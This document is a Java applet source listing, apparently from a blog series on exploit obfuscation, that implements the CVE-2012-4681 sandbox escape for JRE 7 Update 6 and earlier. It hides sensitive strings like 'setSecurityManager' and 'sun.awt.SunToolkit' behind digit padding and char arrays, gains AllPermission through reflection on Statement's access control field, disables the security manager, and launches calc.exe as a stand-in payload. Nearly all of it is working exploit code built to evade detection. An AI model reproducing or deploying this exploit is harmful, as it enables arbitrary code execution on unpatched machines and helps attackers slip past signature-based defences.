Java 7 Exploit CVE-2012-4681 obfuscation pt. 1/5

1. /*
2.  *  Java 7 Exploit CVE-2012-4681
3.  *  
4.  *  Affected product versions:
5.  *  - JDK and JRE 7 Update 6 and before
6.  *
7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
8.  */
9. import java.applet.Applet;
10. import java.awt.Graphics;
11. import java.beans.Expression;
12. import java.beans.Statement;
13. import java.lang.reflect.Field;
14. import java.net.URL;
15. import java.security.*;
16. import java.security.cert.Certificate;
17.  
18. public class Gondvv extends Applet
19. {
20.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
21.     char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
22.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
23.     String   ad = "or",me = "me", aw = "f", kl = "Na"; // forName
24.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
25.    
26.     public Gondvv()
27.     {
28.     }
29.  
30.     public void disableSecurity()
31.         throws Throwable
32.     {
33.         Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
34.         Permissions localPermissions = new Permissions();
35.         localPermissions.add(new AllPermission());
36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
38.             localProtectionDomain
39.         });
40.         SetField(Statement.class, "a"+"c"+"c", localStatement, localAccessControlContext);
41.         localStatement.execute();
42.     }
43.  
44.     private Class GetClass(String paramString)
45.         throws Throwable
46.     {
47.         Object arrayOfObject[] = new Object[1];
48.         arrayOfObject[0] = paramString;
49.         Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
50.         localExpression.execute();
51.         return (Class)localExpression.getValue();
52.     }
53.  
54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
55.         throws Throwable
56.     {
57.         Object arrayOfObject[] = new Object[2];
58.         arrayOfObject[0] = paramClass;
59.         arrayOfObject[1] = paramString;
60.         Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
61.         localExpression.execute();
62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
63.     }
64.  
65.     public void init()
66.     {
67.         try
68.         {
69.             disableSecurity();
70.             Process localProcess = null;
71.             localProcess = Runtime.getRuntime().exec("calc.exe");
72.             if(localProcess != null);
73.                localProcess.waitFor();
74.         }
75.         catch(Throwable localThrowable)
76.         {
77.             localThrowable.printStackTrace();
78.         }
79.     }
80.  
81.     public void paint(Graphics paramGraphics)
82.     {
83.         paramGraphics.drawString("Loading", 50, 25);
84.     }
85. }